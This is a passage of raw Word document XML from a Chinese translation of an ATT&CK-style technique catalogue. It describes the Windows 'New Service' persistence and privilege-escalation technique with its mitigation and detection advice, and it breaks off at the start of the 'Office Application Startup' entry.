          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="46434B9B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F8C578A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1050</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76074B21" w14:textId="00531428" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DA36E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E786CB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CEFA8E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612FB2DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DED6EF2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId61" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-550</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18C62FA1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Pedro Harrison</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="061DF4C1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EB85BB1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A25BBC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统启动时，可以启动称为服务的程序或应用来执行后台系统功能。服务配置信息，包括服务可执行文件路径，存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA60B3E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会安装一个新的服务，并</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>配置服务在启动时</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过使用实用程序与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>服务交互</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或直接修改注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。服务名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以伪装为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关操作系统或良性软件中的名称。服务可能会是以管理员权限创建，但在系统权限下执行。因此，攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能使用服务将权限级别从管理员提升到系统。攻击者也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能通过</w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00671A0D">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>服务执行</w:t>
        </w:r>
        <w:r w:rsidRPr="00671A0D">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>技术</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>直接启动服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A4275" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3428"/>
        <w:gridCol w:w="6308"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00557D03" w14:paraId="15EA6C59" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3428" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="59A462EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6308" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="12746243" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0D4D123E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3428" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D4B5B29" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EF52304" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制用户账号权限并调整权限提升</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>途径</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，以便只有授权管理员才能创建新服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60C19A6E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4E59DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA15FB" w14:textId="5F98AF3D" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有改动或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见实用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>程序是否有命令行调用来监控服务创建。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建新服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会有可变事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，比如，事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4697</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7045</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。安装新软件过程中可能会创建新的良性服务。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，例如为</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而建立网络连接，通过发现了解环境的详细信息，以及横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F89F58F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性的系统更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与已知软件、补丁周期等不相关的服务更改。通过服务执行的可疑程序可能会显示为异常进程。与历史数据进行比较时，这些进程以前从未出现过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E2B57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控服务创建的相关进程和命令行参数。带内置功能的远程访问工具可以直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互，在典型系统实用程序之外执行这些功能。还可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来创建服务。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通过此方式创建服务，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能还需要配置日志功能来收集适当的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F191E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用启动</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="462A17E8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E764672" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1137</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7957DC" w14:textId="3C19E731" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2C6D10" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F60C5FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office 2007</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2010</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2013</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2015</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2016</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；加载项：有些需要管理员权限</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E98908A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DEDF439" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CBEEC5F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Praetorian</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Nick Carr</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>FireEye</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Loic Jaquemet</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ricardo Dias</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="537EE528" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
